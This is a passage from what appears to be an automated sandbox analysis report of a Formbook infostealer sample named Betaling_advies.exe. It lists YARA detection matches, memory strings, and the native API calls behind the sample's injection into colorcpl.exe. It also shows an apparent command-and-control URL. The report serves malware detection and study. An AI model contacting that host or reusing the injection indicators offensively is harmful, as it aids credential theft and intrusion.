          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: colorcpl.exe, 00000007.00000002.911472356.0000000004D52000.00000004.00000001.sdmpString found in binary or memory: https://www.werealestatephotography.com/hw6d/?DnbLu=um
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Betaling_advies.exe.2680000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Betaling_advies.exe.2680000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Betaling_advies.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Betaling_advies.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Betaling_advies.exe.2680000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Betaling_advies.exe.2680000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_004181AA NtCreateFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_004182DA NtClose,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A798F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A795D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A797A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A798A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A7B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A799D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A7A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A795F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A7AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79560 NtWriteFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A796D0 NtCreateKey,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A7A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A79770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A7A770 NtOpenThread,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_004182E0 NtClose,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_004181AA NtCreateFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_004182DA NtClose,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047096D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709560 NtWriteFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0470AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047095F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0470A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0470A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047097A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0470B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047098F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047098A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047099D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04709B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0470A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02548260 NtReadFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_025482E0 NtClose,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02548390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_025481B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_025482DA NtClose,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_025481AA NtCreateFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 0_2_004046A7
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00408C4B
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00408C50
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_0041BC56
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_0041B496
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_0041CD31
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00402D87
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A620A0
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B020A8
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4B090
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B028EC
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B0E824
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF1002
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A54120
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3F900
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B022AE
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AEFA2B
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6EBB0
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF03DA
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFDBD2
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B02B28
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4841F
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFD466
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A62581
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4D5E0
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B025DD
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A30D20
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B02D07
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B01D55
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B02EF7
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A56E30
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFD616
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B01FF1
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B0DFCE
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_00408C4B
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_00408C50
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_0041BC56
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_0041B496
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_0041CD31
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_00402D87
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_00402D90
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_00402FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0478D466
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D841F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04791D55
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C0D20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04792D07
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046DD5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047925DD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F2581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046E6E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0478D616
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04792EF7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04791FF1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781002
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047928EC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F20A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047920A8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046DB090
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046E4120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046CF900
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047922AE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04792B28
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0478DBD2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FEBB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02532FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02538C50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02538C4B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0254B496
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0254CD31
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02532D90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02532D87
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: String function: 00A3B150 appears 45 times
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: String function: 0041A090 appears 38 times
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 046CB150 appears 35 times
          Source: Betaling_advies.exe, 00000000.00000003.651276724.000000001F15F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Betaling_advies.exe
          Source: Betaling_advies.exe, 00000001.00000002.692105049.0000000000B2F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Betaling_advies.exe
          Source: Betaling_advies.exe, 00000001.00000002.692711929.0000000000D73000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs Betaling_advies.exe
          Source: Betaling_advies.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
